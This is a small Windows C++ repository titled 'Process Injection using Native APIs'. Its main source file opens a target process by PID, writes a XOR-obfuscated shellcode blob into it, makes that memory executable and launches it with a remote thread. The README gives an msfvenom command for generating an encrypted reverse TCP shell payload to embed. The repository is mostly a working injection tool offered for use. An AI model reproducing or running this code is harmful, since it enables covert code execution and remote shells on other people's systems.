├── .gitignore
├── NativeAPIs.sln
├── NativeAPIs
    ├── Native.h
    ├── NativeAPIs.cpp
    ├── NativeAPIs.vcxproj
    ├── NativeAPIs.vcxproj.filters
    └── NativeAPIs.vcxproj.user
└── README.md


/.gitignore:
--------------------------------------------------------------------------------
1 | .vs/


--------------------------------------------------------------------------------
/NativeAPIs.sln:
--------------------------------------------------------------------------------
 1 | 
 2 | Microsoft Visual Studio Solution File, Format Version 12.00
 3 | # Visual Studio Version 17
 4 | VisualStudioVersion = 17.8.34408.163
 5 | MinimumVisualStudioVersion = 10.0.40219.1
 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NativeAPIs", "NativeAPIs\NativeAPIs.vcxproj", "{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}"
 7 | EndProject
 8 | Global
 9 | 	GlobalSection(SolutionConfigurationPlatforms) = preSolution
10 | 		Debug|x64 = Debug|x64
11 | 		Debug|x86 = Debug|x86
12 | 		Release|x64 = Release|x64
13 | 		Release|x86 = Release|x86
14 | 	EndGlobalSection
15 | 	GlobalSection(ProjectConfigurationPlatforms) = postSolution
16 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Debug|x64.ActiveCfg = Debug|x64
17 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Debug|x64.Build.0 = Debug|x64
18 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Debug|x86.ActiveCfg = Debug|Win32
19 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Debug|x86.Build.0 = Debug|Win32
20 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Release|x64.ActiveCfg = Release|x64
21 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Release|x64.Build.0 = Release|x64
22 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Release|x86.ActiveCfg = Release|Win32
23 | 		{20ED4627-62C4-4253-A3E9-9BF6FAD92C88}.Release|x86.Build.0 = Release|Win32
24 | 	EndGlobalSection
25 | 	GlobalSection(SolutionProperties) = preSolution
26 | 		HideSolutionNode = FALSE
27 | 	EndGlobalSection
28 | 	GlobalSection(ExtensibilityGlobals) = postSolution
29 | 		SolutionGuid = {C67AA0F4-CB91-4768-8C7C-37A7EB52C0ED}
30 | 	EndGlobalSection
31 | EndGlobal
32 | 


--------------------------------------------------------------------------------
/NativeAPIs/Native.h:
--------------------------------------------------------------------------------
  1 | #pragma once
  2 | 
  3 | #include <stdio.h>
  4 | #include <windows.h>
  5 | 
  6 | /*------------------------------[MACROS]----------------------------------*/
  7 | #define okay(msg, ...) printf("[+] " msg "\n", ##__VA_ARGS__)
  8 | #define info(msg, ...) printf("[*] " msg "\n", ##__VA_ARGS__)
  9 | #define warn(msg, ...) printf("[-] " msg "\n", ##__VA_ARGS__)
 10 | 
 11 | /*------------------------------[DECLARATIONS]----------------------------------*/
 12 | #define STATUS_SUCCESS ((NTSTATUS)0x00000000L)
 13 | NTSTATUS    STATUS = NULL;
 14 | 
 15 | /*--------------------------------[STRUCTS]----------------------------------*/
 16 | 
 17 | typedef struct _OBJECT_ATTRIBUTES //0x30 bytes (sizeof)
 18 | {
 19 |     ULONG Length;                                                           //0x0
 20 |     VOID* RootDirectory;                                                    //0x8
 21 |     struct _UNICODE_STRING* ObjectName;                                     //0x10
 22 |     ULONG Attributes;                                                       //0x18
 23 |     VOID* SecurityDescriptor;                                               //0x20
 24 |     VOID* SecurityQualityOfService;                                         //0x28
 25 | } OBJECT_ATTRIBUTES, * POBJECT_ATTRIBUTES;
 26 | 
 27 | //0x10 bytes (sizeof)
 28 | typedef struct _CLIENT_ID
 29 | {
 30 |     VOID* UniqueProcess;                                                    //0x0
 31 |     VOID* UniqueThread;                                                     //0x8
 32 | } CLIENT_ID, * PCLIENT_ID;
 33 | 
 34 | typedef struct _PS_ATTRIBUTE
 35 | {
 36 |     ULONG_PTR Attribute;
 37 |     SIZE_T Size;
 38 |     union
 39 |     {
 40 |         ULONG_PTR Value;
 41 |         PVOID ValuePtr;
 42 |     };
 43 |     PSIZE_T ReturnLength;
 44 | } PS_ATTRIBUTE, * PPS_ATTRIBUTE;
 45 | 
 46 | typedef struct _PS_ATTRIBUTE_LIST
 47 | {
 48 |     SIZE_T TotalLength;
 49 |     PS_ATTRIBUTE Attributes[1];
 50 | } PS_ATTRIBUTE_LIST, * PPS_ATTRIBUTE_LIST;
 51 | 
 52 | 
 53 | /*-----------------------------[FUNCTION PROTOTYPES]----------------------------*/
 54 | 
 55 | 
 56 | typedef NTSTATUS(NTAPI *NtCreateProcess)(
 57 |     OUT PHANDLE           ProcessHandle,
 58 |     IN ACCESS_MASK        DesiredAccess,
 59 |     IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL,
 60 |     IN HANDLE             ParentProcess,
 61 |     IN BOOLEAN            InheritObjectTable,
 62 |     IN HANDLE             SectionHandle OPTIONAL,
 63 |     IN HANDLE             DebugPort OPTIONAL,
 64 |     IN HANDLE             ExceptionPort OPTIONAL);
 65 | 
 66 | typedef NTSTATUS(NTAPI* NtOpenProcess)(
 67 |     _Out_ PHANDLE ProcessHandle,
 68 |     _In_ ACCESS_MASK DesiredAccess,
 69 |     _In_ POBJECT_ATTRIBUTES ObjectAttributes,
 70 |     _In_opt_ PCLIENT_ID ClientId
 71 |     );
 72 | 
 73 | typedef NTSTATUS(NTAPI* NtCreateThreadEx)(
 74 |     _Out_ PHANDLE ThreadHandle,
 75 |     _In_ ACCESS_MASK DesiredAccess,
 76 |     _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
 77 |     _In_ HANDLE ProcessHandle,
 78 |     _In_ PVOID StartRoutine,
 79 |     _In_opt_ PVOID Argument,
 80 |     _In_ ULONG CreateFlags, // THREAD_CREATE_FLAGS_*
 81 |     _In_ SIZE_T ZeroBits,
 82 |     _In_ SIZE_T StackSize,
 83 |     _In_ SIZE_T MaximumStackSize,
 84 |     _In_opt_ PPS_ATTRIBUTE_LIST AttributeList
 85 |     );
 86 | 
 87 | typedef NTSTATUS(NTAPI* NtClose) (
 88 |     _In_ _Post_ptr_invalid_ HANDLE Handle
 89 |     );
 90 | 
 91 | typedef NTSTATUS(NTAPI* NtAllocateVirtualMemory)(
 92 |     _In_ HANDLE ProcessHandle,
 93 |     _Inout_ _At_(*BaseAddress, _Readable_bytes_(*RegionSize) _Writable_bytes_(*RegionSize) _Post_readable_byte_size_(*RegionSize)) PVOID* BaseAddress,
 94 |     _In_ ULONG_PTR ZeroBits,
 95 |     _Inout_ PSIZE_T RegionSize,
 96 |     _In_ ULONG AllocationType,
 97 |     _In_ ULONG Protect
 98 | );
 99 | 
100 | typedef NTSTATUS(NTAPI* NtWriteVirtualMemory)(
101 |     IN HANDLE               ProcessHandle,
102 |     IN PVOID                BaseAddress,
103 |     IN PVOID                Buffer,
104 |     IN ULONG                NumberOfBytesToWrite,
105 |     OUT PULONG              NumberOfBytesWritten OPTIONAL
106 | );
107 | 
108 | typedef NTSTATUS(NTAPI* NtProtectVirtualMemory)(
109 |     IN HANDLE               ProcessHandle,
110 |     IN OUT PVOID            *BaseAddress,
111 |     IN OUT PSIZE_T           NumberOfBytesToProtect,
112 |     IN ULONG                NewAccessProtection,
113 |     OUT PULONG              OldAccessProtection
114 | );
115 | 


--------------------------------------------------------------------------------
/NativeAPIs/NativeAPIs.cpp:
--------------------------------------------------------------------------------
  1 | #include <stdio.h>
  2 | #include <windows.h>
  3 | #include "Native.h"
  4 | 
  5 | int main(int argc, char** argv)
  6 | {
  7 |     if (argc < 2) {
  8 |         warn("Usage: %s <PID>", argv[0]);
  9 |         return EXIT_FAILURE;
 10 |     }
 11 | 
 12 |     DWORD       PID         = 0;
 13 |     PVOID       rBuffer     = NULL;
 14 |     HANDLE      hThread     = NULL;
 15 |     HANDLE      hProcess    = NULL;
 16 |     HMODULE     hNTDLL      = NULL; // ntdll.dll handle
 17 |     ULONG       OldAccessProtection; // for NtProtectVirtualMemory
 18 |     
 19 |     unsigned char shellCode[] = 
 20 |         "\x86\x32\xf9\x9e\x8a\x92\xba\x7a\x7a\x7a\x3b\x2b\x3b\x2a"
 21 |         "\x28\x2b\x2c\x32\x4b\xa8\x1f\x32\xf1\x28\x1a\x32\xf1\x28"
 22 |         "\x62\x32\xf1\x28\x5a\x32\xf1\x08\x2a\x32\x75\xcd\x30\x30"
 23 |         "\x37\x4b\xb3\x32\x4b\xba\xd6\x46\x1b\x06\x78\x56\x5a\x3b"
 24 |         "\xbb\xb3\x77\x3b\x7b\xbb\x98\x97\x28\x3b\x2b\x32\xf1\x28"
 25 |         "\x5a\xf1\x38\x46\x32\x7b\xaa\xf1\xfa\xf2\x7a\x7a\x7a\x32"
 26 |         "\xff\xba\x0e\x1d\x32\x7b\xaa\x2a\xf1\x32\x62\x3e\xf1\x3a"
 27 |         "\x5a\x33\x7b\xaa\x99\x2c\x32\x85\xb3\x3b\xf1\x4e\xf2\x32"
 28 |         "\x7b\xac\x37\x4b\xb3\x32\x4b\xba\xd6\x3b\xbb\xb3\x77\x3b"
 29 |         "\x7b\xbb\x42\x9a\x0f\x8b\x36\x79\x36\x5e\x72\x3f\x43\xab"
 30 |         "\x0f\xa2\x22\x3e\xf1\x3a\x5e\x33\x7b\xaa\x1c\x3b\xf1\x76"
 31 |         "\x32\x3e\xf1\x3a\x66\x33\x7b\xaa\x3b\xf1\x7e\xf2\x32\x7b"
 32 |         "\xaa\x3b\x22\x3b\x22\x24\x23\x20\x3b\x22\x3b\x23\x3b\x20"
 33 |         "\x32\xf9\x96\x5a\x3b\x28\x85\x9a\x22\x3b\x23\x20\x32\xf1"
 34 |         "\x68\x93\x2d\x85\x85\x85\x27\x33\xc4\x0d\x09\x48\x25\x49"
 35 |         "\x48\x7a\x7a\x3b\x2c\x33\xf3\x9c\x32\xfb\x96\xda\x7b\x7a"
 36 |         "\x7a\x33\xf3\x9f\x33\xc6\x78\x7a\x6b\x26\xba\xd2\xd1\xfa"
 37 |         "\x3b\x2e\x33\xf3\x9e\x36\xf3\x8b\x3b\xc0\x36\x0d\x5c\x7d"
 38 |         "\x85\xaf\x36\xf3\x90\x12\x7b\x7b\x7a\x7a\x23\x3b\xc0\x53"
 39 |         "\xfa\x11\x7a\x85\xaf\x2a\x2a\x37\x4b\xb3\x37\x4b\xba\x32"
 40 |         "\x85\xba\x32\xf3\xb8\x32\x85\xba\x32\xf3\xbb\x3b\xc0\x90"
 41 |         "\x75\xa5\x9a\x85\xaf\x32\xf3\xbd\x10\x6a\x3b\x22\x36\xf3"
 42 |         "\x98\x32\xf3\x83\x3b\xc0\xe3\xdf\x0e\x1b\x85\xaf\x32\xfb"
 43 |         "\xbe\x3a\x78\x7a\x7a\x33\xc2\x19\x17\x1e\x7a\x7a\x7a\x7a"
 44 |         "\x7a\x3b\x2a\x3b\x2a\x32\xf3\x98\x2d\x2d\x2d\x37\x4b\xba"
 45 |         "\x10\x77\x23\x3b\x2a\x98\x86\x1c\xbd\x3e\x5e\x2e\x7b\x7b"
 46 |         "\x32\xf7\x3e\x5e\x62\xbc\x7a\x12\x32\xf3\x9c\x2c\x2a\x3b"
 47 |         "\x2a\x3b\x2a\x3b\x2a\x33\x85\xba\x3b\x2a\x33\x85\xb2\x37"
 48 |         "\xf3\xbb\x36\xf3\xbb\x3b\xc0\x03\xb6\x45\xfc\x85\xaf\x32"
 49 |         "\x4b\xa8\x32\x85\xb0\xf1\x74\x3b\xc0\x72\xfd\x67\x1a\x85"
 50 |         "\xaf\xc1\x9a\x67\x50\x70\x3b\xc0\xdc\xef\xc7\xe7\x85\xaf"
 51 |         "\x32\xf9\xbe\x52\x46\x7c\x06\x70\xfa\x81\x9a\x0f\x7f\xc1"
 52 |         "\x3d\x69\x08\x15\x10\x7a\x23\x3b\xf3\xa0\x85\xaf";
 53 |     
 54 |     SIZE_T shellCodeSize = sizeof(shellCode);
 55 | 
 56 |     //decrypt the payload
 57 |     for (int i = 0; i < shellCodeSize; i++)
 58 |     {
 59 |         shellCode[i] = (byte)(shellCode[i] ^ (byte)'z');
 60 |     }
 61 | 
 62 |     PID = atoi(argv[1]);
 63 | 
 64 |     OBJECT_ATTRIBUTES OA = { sizeof(OA), NULL };
 65 |     CLIENT_ID CID = { 0 };
 66 |     CID.UniqueProcess = (HANDLE)PID;
 67 | 
 68 |     hNTDLL = GetModuleHandle(L"NTDLL");
 69 |     if (hNTDLL == NULL) {
 70 |         warn("Error getting handle to NTDLL");
 71 |         return EXIT_FAILURE;
 72 |     }
 73 | 
 74 |     info("populating function prototypes");
 75 | 
 76 |     NtCreateProcess CustomCreateProcess = (NtCreateProcess)GetProcAddress(hNTDLL, "NtCreateProcess");
 77 |     NtOpenProcess CustomOpenProcess = (NtOpenProcess)GetProcAddress(hNTDLL, "NtOpenProcess");
 78 |     NtAllocateVirtualMemory CustomAllocateVirtualMemory = (NtAllocateVirtualMemory)GetProcAddress(hNTDLL, "NtAllocateVirtualMemory");
 79 |     NtWriteVirtualMemory CustomWriteVirtualMemory = (NtWriteVirtualMemory)GetProcAddress(hNTDLL, "NtWriteVirtualMemory");
 80 |     NtProtectVirtualMemory CustomProtectVirtualMemory = (NtProtectVirtualMemory)GetProcAddress(hNTDLL, "NtProtectVirtualMemory");
 81 |     NtCreateThreadEx CustomCreateThreadEx = (NtCreateThreadEx)GetProcAddress(hNTDLL, "NtCreateThreadEx");
 82 |     NtClose CustomClose = (NtClose)GetProcAddress(hNTDLL, "NtClose");
 83 | 
 84 |     okay("finished populating functions");
 85 | 
 86 |     /*-------------------------------------------------INJECTION PART------------------------------------------------------------*/
 87 | 
 88 |     info("trying to get handle to PID: %ld", PID);
 89 |     STATUS = CustomOpenProcess(&hProcess, PROCESS_ALL_ACCESS, &OA, &CID);
 90 |     if (STATUS != STATUS_SUCCESS) {
 91 |         warn("NtOpenProcess failed to get a handle, error: 0x%lx", STATUS);
 92 |         goto CLEANUP;
 93 |     }
 94 |     okay("Got a handle %p", hProcess);
 95 | 
 96 |     STATUS = CustomAllocateVirtualMemory(hProcess, &rBuffer, NULL, &shellCodeSize, MEM_COMMIT|MEM_RESERVE, PAGE_READWRITE);
 97 |     if (STATUS != STATUS_SUCCESS) {
 98 |         warn("NtAllocateVirtualMemory failed to allocate memory, error: 0x%lx", STATUS);
 99 |         goto CLEANUP;
100 |     }
101 |     okay("Allocated memory for the shellcode, rBuffer=0x%p", rBuffer);
102 | 
103 |     STATUS = CustomWriteVirtualMemory(hProcess, rBuffer, shellCode, sizeof(shellCode), NULL);
104 |     if (STATUS != STATUS_SUCCESS) {
105 |         warn("NtWriteVirtualMemory failed to write to memory address 0x%p, error: 0x%lx",rBuffer, STATUS);
106 |         goto CLEANUP;
107 |     }
108 | 
109 |     okay("Copied the shellcode to the buffer space");
110 | 
111 |     info("Changing memory permission level from RW to RX");
112 |     STATUS = CustomProtectVirtualMemory(hProcess, &rBuffer, &shellCodeSize, PAGE_EXECUTE_READ, &OldAccessProtection);
113 |     if (STATUS != STATUS_SUCCESS) {
114 |         warn("NtProtectVirtualMemory failed to change permission to RX, error: 0x%lx", STATUS);
115 |         goto CLEANUP;
116 |     }
117 | 
118 |     info("Executing the thread");
119 |     STATUS = CustomCreateThreadEx(&hThread, THREAD_ALL_ACCESS, &OA, hProcess, rBuffer, NULL, 0, 0, 0, 0, NULL);
120 |     if (STATUS != STATUS_SUCCESS) {
121 |         warn("NtOpenProcess failed to get a handle, error: 0x%lx", STATUS);
122 |         goto CLEANUP;
123 |     }
124 |     okay("thread created, started routine! waiting for the thread to finish execution.");
125 |     
126 |     WaitForSingleObject(hThread, INFINITE);
127 |     goto CLEANUP;
128 | 
129 | CLEANUP:
130 |     if (hProcess) {
131 |         info("closing handle to process");
132 |         CustomClose(hProcess);
133 |     }
134 |     if (hThread) {
135 |         info("closing handle to process");
136 |         CustomClose(hThread);
137 |     }
138 |     okay("Finished.");
139 |     return EXIT_SUCCESS;
140 | }
141 | 


--------------------------------------------------------------------------------
/NativeAPIs/NativeAPIs.vcxproj:
--------------------------------------------------------------------------------
  1 | <?xml version="1.0" encoding="utf-8"?>
  2 | <Project DefaultTargets="Build" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
  3 |   <ItemGroup Label="ProjectConfigurations">
  4 |     <ProjectConfiguration Include="Debug|Win32">
  5 |       <Configuration>Debug</Configuration>
  6 |       <Platform>Win32</Platform>
  7 |     </ProjectConfiguration>
  8 |     <ProjectConfiguration Include="Release|Win32">
  9 |       <Configuration>Release</Configuration>
 10 |       <Platform>Win32</Platform>
 11 |     </ProjectConfiguration>
 12 |     <ProjectConfiguration Include="Debug|x64">
 13 |       <Configuration>Debug</Configuration>
 14 |       <Platform>x64</Platform>
 15 |     </ProjectConfiguration>
 16 |     <ProjectConfiguration Include="Release|x64">
 17 |       <Configuration>Release</Configuration>
 18 |       <Platform>x64</Platform>
 19 |     </ProjectConfiguration>
 20 |   </ItemGroup>
 21 |   <PropertyGroup Label="Globals">
 22 |     <VCProjectVersion>17.0</VCProjectVersion>
 23 |     <Keyword>Win32Proj</Keyword>
 24 |     <ProjectGuid>{20ed4627-62c4-4253-a3e9-9bf6fad92c88}</ProjectGuid>
 25 |     <RootNamespace>NativeAPIs</RootNamespace>
 26 |     <WindowsTargetPlatformVersion>10.0</WindowsTargetPlatformVersion>
 27 |   </PropertyGroup>
 28 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
 29 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
 30 |     <ConfigurationType>Application</ConfigurationType>
 31 |     <UseDebugLibraries>true</UseDebugLibraries>
 32 |     <PlatformToolset>v143</PlatformToolset>
 33 |     <CharacterSet>Unicode</CharacterSet>
 34 |   </PropertyGroup>
 35 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
 36 |     <ConfigurationType>Application</ConfigurationType>
 37 |     <UseDebugLibraries>false</UseDebugLibraries>
 38 |     <PlatformToolset>v143</PlatformToolset>
 39 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 40 |     <CharacterSet>Unicode</CharacterSet>
 41 |   </PropertyGroup>
 42 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
 43 |     <ConfigurationType>Application</ConfigurationType>
 44 |     <UseDebugLibraries>true</UseDebugLibraries>
 45 |     <PlatformToolset>v143</PlatformToolset>
 46 |     <CharacterSet>Unicode</CharacterSet>
 47 |   </PropertyGroup>
 48 |   <PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
 49 |     <ConfigurationType>Application</ConfigurationType>
 50 |     <UseDebugLibraries>false</UseDebugLibraries>
 51 |     <PlatformToolset>v143</PlatformToolset>
 52 |     <WholeProgramOptimization>true</WholeProgramOptimization>
 53 |     <CharacterSet>Unicode</CharacterSet>
 54 |   </PropertyGroup>
 55 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
 56 |   <ImportGroup Label="ExtensionSettings">
 57 |   </ImportGroup>
 58 |   <ImportGroup Label="Shared">
 59 |   </ImportGroup>
 60 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 61 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 62 |   </ImportGroup>
 63 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 64 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 65 |   </ImportGroup>
 66 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
 67 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 68 |   </ImportGroup>
 69 |   <ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
 70 |     <Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
 71 |   </ImportGroup>
 72 |   <PropertyGroup Label="UserMacros" />
 73 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
 74 |     <ClCompile>
 75 |       <WarningLevel>Level3</WarningLevel>
 76 |       <SDLCheck>true</SDLCheck>
 77 |       <PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 78 |       <ConformanceMode>true</ConformanceMode>
 79 |     </ClCompile>
 80 |     <Link>
 81 |       <SubSystem>Console</SubSystem>
 82 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 83 |     </Link>
 84 |   </ItemDefinitionGroup>
 85 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
 86 |     <ClCompile>
 87 |       <WarningLevel>Level3</WarningLevel>
 88 |       <FunctionLevelLinking>true</FunctionLevelLinking>
 89 |       <IntrinsicFunctions>true</IntrinsicFunctions>
 90 |       <SDLCheck>true</SDLCheck>
 91 |       <PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
 92 |       <ConformanceMode>true</ConformanceMode>
 93 |     </ClCompile>
 94 |     <Link>
 95 |       <SubSystem>Console</SubSystem>
 96 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
 97 |       <OptimizeReferences>true</OptimizeReferences>
 98 |       <GenerateDebugInformation>true</GenerateDebugInformation>
 99 |     </Link>
100 |   </ItemDefinitionGroup>
101 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
102 |     <ClCompile>
103 |       <WarningLevel>Level3</WarningLevel>
104 |       <SDLCheck>true</SDLCheck>
105 |       <PreprocessorDefinitions>_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
106 |       <ConformanceMode>true</ConformanceMode>
107 |     </ClCompile>
108 |     <Link>
109 |       <SubSystem>Console</SubSystem>
110 |       <GenerateDebugInformation>true</GenerateDebugInformation>
111 |     </Link>
112 |   </ItemDefinitionGroup>
113 |   <ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
114 |     <ClCompile>
115 |       <WarningLevel>Level3</WarningLevel>
116 |       <FunctionLevelLinking>true</FunctionLevelLinking>
117 |       <IntrinsicFunctions>true</IntrinsicFunctions>
118 |       <SDLCheck>true</SDLCheck>
119 |       <PreprocessorDefinitions>NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
120 |       <ConformanceMode>true</ConformanceMode>
121 |     </ClCompile>
122 |     <Link>
123 |       <SubSystem>Console</SubSystem>
124 |       <EnableCOMDATFolding>true</EnableCOMDATFolding>
125 |       <OptimizeReferences>true</OptimizeReferences>
126 |       <GenerateDebugInformation>true</GenerateDebugInformation>
127 |     </Link>
128 |   </ItemDefinitionGroup>
129 |   <ItemGroup>
130 |     <ClCompile Include="NativeAPIs.cpp" />
131 |   </ItemGroup>
132 |   <ItemGroup>
133 |     <ClInclude Include="Native.h" />
134 |   </ItemGroup>
135 |   <Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
136 |   <ImportGroup Label="ExtensionTargets">
137 |   </ImportGroup>
138 | </Project>


--------------------------------------------------------------------------------
/NativeAPIs/NativeAPIs.vcxproj.filters:
--------------------------------------------------------------------------------
 1 | <?xml version="1.0" encoding="utf-8"?>
 2 | <Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
 3 |   <ItemGroup>
 4 |     <Filter Include="Source Files">
 5 |       <UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
 6 |       <Extensions>cpp;c;cc;cxx;c++;cppm;ixx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
 7 |     </Filter>
 8 |     <Filter Include="Header Files">
 9 |       <UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
10 |       <Extensions>h;hh;hpp;hxx;h++;hm;inl;inc;ipp;xsd</Extensions>
11 |     </Filter>
12 |     <Filter Include="Resource Files">
13 |       <UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
14 |       <Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
15 |     </Filter>
16 |   </ItemGroup>
17 |   <ItemGroup>
18 |     <ClCompile Include="NativeAPIs.cpp">
19 |       <Filter>Source Files</Filter>
20 |     </ClCompile>
21 |   </ItemGroup>
22 |   <ItemGroup>
23 |     <ClInclude Include="Native.h">
24 |       <Filter>Source Files</Filter>
25 |     </ClInclude>
26 |   </ItemGroup>
27 | </Project>


--------------------------------------------------------------------------------
/NativeAPIs/NativeAPIs.vcxproj.user:
--------------------------------------------------------------------------------
1 | <?xml version="1.0" encoding="utf-8"?>
2 | <Project ToolsVersion="Current" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
3 |   <PropertyGroup />
4 | </Project>


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Process Injection using Native APIs
 2 | 
 3 | ## Usage 
 4 | 1. Generate and replace the shellCode:
 5 | ```
 6 | $ msfvenom -p windows/x64/shell_reverse_tcp LHOST=eth0 LPORT=4444 --arc x64 --platform windows EXITFUNC=thread --encrypt xor --encrypt-key z -f c
 7 | ```
 8 | 2. Build the project (x64)
 9 | 3. Execute
10 | ```
11 | .\NativeAPIs.exe <PID>
12 | ```
13 | ![image](https://github.com/NotokDay/NTProcessInjector/assets/115024808/77c97a98-7cf5-40fa-9df0-1eadb3521502)
14 | ![image](https://github.com/NotokDay/NTProcessInjector/assets/115024808/110de900-50ae-45ca-b595-69a3dd082e4a)
15 | 


--------------------------------------------------------------------------------